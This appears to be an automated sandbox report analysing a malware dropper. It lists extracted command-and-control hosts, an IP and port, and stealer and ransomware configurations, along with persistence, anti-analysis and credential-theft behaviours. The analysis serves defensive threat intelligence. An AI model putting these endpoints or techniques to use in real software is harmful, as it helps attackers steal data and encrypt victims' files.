Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
1801s -
max time network
1803s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
22-10-2021 17:40
Static task
static1
Behavioral task
behavioral1
Sample
Fri051e1e7444.exe
Resource
win10-en-20211014
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Malware Config
Extracted
C:\_readme.txt
djvu
https://we.tl/t-pk3SGFlmek
Extracted
vidar
41.5
903
https://mas.to/@xeroxxx
-
profile_id
903
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
Extracted
vidar
41.5
937
https://mas.to/@xeroxxx
-
profile_id
937
Extracted
redline
205.185.119.191:60857
Extracted
vidar
41.5
921
https://mas.to/@xeroxxx
-
profile_id
921
Extracted
raccoon
7c9b4504a63ed23664e38808e65948379b790395
-
url4cnc
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar
Extracted
vidar
41.5
933
https://mas.to/@xeroxxx
-
profile_id
933
Extracted
djvu
http://rlrz.org/lancer
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1536 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2192 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2372 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4052 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2300 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 896 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4484 4956 schtasks.exe 107 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1828 4956 schtasks.exe 107 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral1/memory/3436-186-0x0000000000400000-0x000000000043C000-memory.dmp family_redline behavioral1/memory/3436-188-0x00000000004368BE-mapping.dmp family_redline behavioral1/memory/996-203-0x0000000004AD0000-0x0000000004AEF000-memory.dmp family_redline behavioral1/memory/996-205-0x0000000004CF0000-0x0000000004D0D000-memory.dmp family_redline behavioral1/memory/3816-379-0x0000000000418AFE-mapping.dmp family_redline behavioral1/memory/3816-387-0x00000000053F0000-0x00000000059F6000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral1/files/0x000400000001ac21-251.dat family_socelars behavioral1/files/0x000400000001ac21-250.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 4092 created 300 4092 WerFault.exe 148 PID 5960 created 5168 5960 WerFault.exe 193 -
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
-
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
-
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 9 IoCs
resource yara_rule behavioral1/memory/3876-124-0x0000000000400000-0x00000000008F1000-memory.dmp family_vidar behavioral1/memory/3876-123-0x0000000000E00000-0x0000000000ED6000-memory.dmp family_vidar behavioral1/memory/4668-158-0x0000000000400000-0x00000000008E3000-memory.dmp family_vidar behavioral1/memory/4668-157-0x0000000000ED0000-0x0000000000FA6000-memory.dmp family_vidar behavioral1/memory/1308-230-0x000000001C470000-0x000000001C548000-memory.dmp family_vidar behavioral1/files/0x000500000001ac08-243.dat family_vidar behavioral1/files/0x000500000001ac08-242.dat family_vidar behavioral1/memory/3056-469-0x0000000000DA0000-0x0000000000E76000-memory.dmp family_vidar behavioral1/memory/3056-473-0x0000000000400000-0x00000000008F1000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
pid Process 1180 RqcBdtquQCGLaKIMXJSNd_ZL.exe 3876 RYVmga2gCYCILuVDQzIlK5af.exe 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 2768 OcB4jBzI70tFnRtK1WZB1Ocm.exe 4984 UJrypcnxqC2LaOpY9q8RWOKu.exe 4236 fgEDF5i3cgIOuMMvQaNZ1NCZ.exe 4668 mt5IRqNxCvOuLR7GM_no0d2t.exe 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 772 aoWnOtt3BnvpIQ5LuYSMKmgs.exe 740 aoWnOtt3BnvpIQ5LuYSMKmgs.tmp 708 gXt9NtnPmMCRWaXBrQk8NfGb.exe 996 _eKJw2OFuLijigALN0RShv0q.exe 3436 xcW3TuSn3KSNmakFvG9gZQDx.exe 1308 cwvHAknFTAWGE2B0rxX1TkrF.exe 1740 cutm3.exe 1900 DownFlSetup999.exe 1576 inst3.exe 1276 build.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3276 n6LyyW6Y130rISPizyLnNBN_.exe 3196 9NDwiPlZEEhDGlkz9gl0UQAX.exe 4488 Ul6PF7ORyqCzK3rFPRAWHREO.exe 4500 DYbALA.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 640 exJBBJ57RhMwfX6V7rNCirtY.exe 3932 8pWB.eXE 2496 EF78.exe 344 EF78.exe 4456 ShellExperienceHost.exe 4972 NvFMn_zIjzcOhCOAYPNfV55o.exe 2176 1hlySlP9nisX71mJnP5mZ3Qa.exe 4632 kMqKKP_wvgeIt3GAmkhy0_7l.exe 3932 foldershare.exe 300 EWVAtHTOXdt0DAYRA3GEQBur.exe 4836 SHodecytolae.exe 4256 NvFMn_zIjzcOhCOAYPNfV55o.exe 3816 NvFMn_zIjzcOhCOAYPNfV55o.exe 1060 ZuWzpISe9wfUgG8mQ9ORonH1.exe 592 YLPxR1bFWYWLGzK0QEMH4Yaa.exe 3580 LzmwAqmV.exe 4624 BCleanSoft86.exe 3056 Soft1WW02.exe 4648 setup.exe 1068 inst2.exe 200 setup.tmp 2072 askinstall60.exe 4644 6.exe 2976 ligr-game.exe 4940 customer7.exe 5168 setup_2.exe 5160 setup.exe 5228 sfx.exe 5276 setup.tmp 5300 10.exe 5364 Calculator Installation.exe 5768 svchost.exe 5932 LzmwAqmV.exe 4004 kPBhgOaGQk.exe 1752 LzmwAqmV.exe 2524 postback.exe 2568 FarLabUninstaller.exe 2876 NDP472-KB4054531-Web.exe 5232 Setup.exe 3688 142D.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\ConvertTrace.tiff D725.exe File renamed C:\Users\Admin\Pictures\ConvertTrace.tiff => C:\Users\Admin\Pictures\ConvertTrace.tiff.zaps D725.exe File renamed C:\Users\Admin\Pictures\RestoreCopy.crw => C:\Users\Admin\Pictures\RestoreCopy.crw.zaps D725.exe File renamed C:\Users\Admin\Pictures\StepRedo.raw => C:\Users\Admin\Pictures\StepRedo.raw.zaps D725.exe File renamed C:\Users\Admin\Pictures\CompressStart.crw => C:\Users\Admin\Pictures\CompressStart.crw.zaps D725.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZuWzpISe9wfUgG8mQ9ORonH1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion YLPxR1bFWYWLGzK0QEMH4Yaa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kMqKKP_wvgeIt3GAmkhy0_7l.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 142D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 142D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion exJBBJ57RhMwfX6V7rNCirtY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion exJBBJ57RhMwfX6V7rNCirtY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ShellExperienceHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kMqKKP_wvgeIt3GAmkhy0_7l.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ShellExperienceHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZuWzpISe9wfUgG8mQ9ORonH1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion YLPxR1bFWYWLGzK0QEMH4Yaa.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Fri051e1e7444.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation SHodecytolae.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation FarLabUninstaller.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Wine ShellExperienceHost.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Wine exJBBJ57RhMwfX6V7rNCirtY.exe -
Loads dropped DLL 64 IoCs
pid Process 740 aoWnOtt3BnvpIQ5LuYSMKmgs.tmp 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3876 RYVmga2gCYCILuVDQzIlK5af.exe 3876 RYVmga2gCYCILuVDQzIlK5af.exe 1436 msiexec.exe 1436 msiexec.exe 4668 mt5IRqNxCvOuLR7GM_no0d2t.exe 4668 mt5IRqNxCvOuLR7GM_no0d2t.exe 1276 build.exe 1276 build.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 3824 FmIprFPSFzOTXlcTeprUC6YU.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 3240 9NDwiPlZEEhDGlkz9gl0UQAX.exe 200 setup.tmp 5276 setup.tmp 5364 Calculator Installation.exe 5364 Calculator Installation.exe 5364 Calculator Installation.exe 5364 Calculator Installation.exe 3056 Soft1WW02.exe 3056 Soft1WW02.exe 5364 Calculator Installation.exe 5364 Calculator Installation.exe 5232 Setup.exe 5232 Setup.exe 4676 msiexec.exe 4676 msiexec.exe 5804 3E6B.exe 5412 regsvr32.exe 1528 727C.exe 4792 32E4.exe 4792 32E4.exe 5760 msiexec.exe 5760 msiexec.exe 1528 727C.exe 1528 727C.exe 1528 727C.exe 1528 727C.exe 5228 regsvr32.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe 5436 LzmwAqmV.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5616 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 727C.exe -
Accesses Microsoft Outlook profiles 1 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook 727C.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook 9NDwiPlZEEhDGlkz9gl0UQAX.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Recovery\\WindowsRE\\smss.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\_eKJw2OFuLijigALN0RShv0q = "\"C:\\Windows\\Tasks\\_eKJw2OFuLijigALN0RShv0q.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\9NDwiPlZEEhDGlkz9gl0UQAX = "\"C:\\Users\\Admin\\Pictures\\Adobe Films\\FmIprFPSFzOTXlcTeprUC6YU\\9NDwiPlZEEhDGlkz9gl0UQAX.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Recovery\\WindowsRE\\ShellExperienceHost.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\\D725.exe\" --AutoStart" D725.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\AbsoluteLLC = "\"C:\\Users\\Admin\\AppData\\Roaming\\LLCA\\AbsoluteLLC.exe\" -autorun" 10A4.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RqcBdtquQCGLaKIMXJSNd_ZL = "\"C:\\odt\\RqcBdtquQCGLaKIMXJSNd_ZL.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp = "\"C:\\Recovery\\WindowsRE\\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\is-KM2OK.tmp\\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\AppxBlockMap\\ShellExperienceHost.exe\"" exJBBJ57RhMwfX6V7rNCirtY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\FarLabUninstaller\\Fafeduceji.exe\"" DYbALA.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 142D.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kMqKKP_wvgeIt3GAmkhy0_7l.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ZuWzpISe9wfUgG8mQ9ORonH1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YLPxR1bFWYWLGzK0QEMH4Yaa.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 38 ipinfo.io 302 ip-api.com 453 api.2ip.ua 1267 api.2ip.ua 1718 api.2ip.ua 1719 api.2ip.ua 2146 api.2ip.ua 37 ipinfo.io 140 ip-api.com 252 ipinfo.io 253 ipinfo.io 440 api.2ip.ua 442 api.2ip.ua -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 explorer.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\t4[1] explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat explorer.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\t4[1] explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat explorer.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 640 exJBBJ57RhMwfX6V7rNCirtY.exe 4456 ShellExperienceHost.exe 4632 kMqKKP_wvgeIt3GAmkhy0_7l.exe 1060 ZuWzpISe9wfUgG8mQ9ORonH1.exe 3688 142D.exe -
Suspicious use of SetThreadContext 38 IoCs
description pid Process procid_target PID 4368 set thread context of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 3680 set thread context of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3196 set thread context of 3240 3196 9NDwiPlZEEhDGlkz9gl0UQAX.exe 97 PID 2496 set thread context of 344 2496 EF78.exe 109 PID 4972 set thread context of 3816 4972 NvFMn_zIjzcOhCOAYPNfV55o.exe 167 PID 5128 set thread context of 1528 5128 727C.exe 252 PID 5632 set thread context of 5360 5632 D725.exe 260 PID 5264 set thread context of 2372 5264 D725.exe 263 PID 1996 set thread context of 5464 1996 build3.exe 291 PID 3084 set thread context of 500 3084 mstsca.exe 303 PID 5804 set thread context of 5780 5804 mstsca.exe 309 PID 5540 set thread context of 4372 5540 mstsca.exe 318 PID 5376 set thread context of 792 5376 mstsca.exe 321 PID 400 set thread context of 224 400 ghdhvts 327 PID 4792 set thread context of 6072 4792 mstsca.exe 328 PID 1200 set thread context of 520 1200 mstsca.exe 333 PID 6392 set thread context of 6564 6392 mstsca.exe 349 PID 7076 set thread context of 5712 7076 mstsca.exe 382 PID 7112 set thread context of 7080 7112 mstsca.exe 387 PID 7084 set thread context of 7424 7084 mstsca.exe 392 PID 7744 set thread context of 7780 7744 mstsca.exe 397 PID 7996 set thread context of 8024 7996 D725.exe 399 PID 6472 set thread context of 6012 6472 mstsca.exe 404 PID 7572 set thread context of 7956 7572 mstsca.exe 406 PID 7392 set thread context of 7444 7392 mstsca.exe 410 PID 7548 set thread context of 4244 7548 ghdhvts 414 PID 6624 set thread context of 8168 6624 mstsca.exe 415 PID 4020 set thread context of 4384 4020 mstsca.exe 418 PID 4080 set thread context of 3212 4080 D725.exe 420 PID 7940 set thread context of 7436 7940 mstsca.exe 422 PID 6740 set thread context of 2124 6740 mstsca.exe 425 PID 7688 set thread context of 2220 7688 mstsca.exe 428 PID 7328 set thread context of 5904 7328 mstsca.exe 430 PID 2300 set thread context of 7880 2300 mstsca.exe 432 PID 4588 set thread context of 8096 4588 D725.exe 435 PID 3860 set thread context of 7592 3860 mstsca.exe 441 PID 2148 set thread context of 5604 2148 mstsca.exe 443 PID 3424 set thread context of 7516 3424 mstsca.exe 445 -
Drops file in Program Files directory 19 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe gXt9NtnPmMCRWaXBrQk8NfGb.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst3.exe gXt9NtnPmMCRWaXBrQk8NfGb.exe File created C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe.config DYbALA.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1hlySlP9nisX71mJnP5mZ3Qa.exe File created C:\Program Files (x86)\FarLabUninstaller\Fafeduceji.exe.config DYbALA.exe File created C:\Program Files (x86)\FarLabUninstaller\is-T2CDF.tmp setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-SM4LU.tmp setup.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1hlySlP9nisX71mJnP5mZ3Qa.exe File created C:\Program Files (x86)\FarLabUninstaller\is-989SV.tmp setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-898PO.tmp setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe gXt9NtnPmMCRWaXBrQk8NfGb.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe gXt9NtnPmMCRWaXBrQk8NfGb.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini gXt9NtnPmMCRWaXBrQk8NfGb.exe File created C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe DYbALA.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe setup.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\Fafeduceji.exe DYbALA.exe -
Drops file in Windows directory 21 IoCs
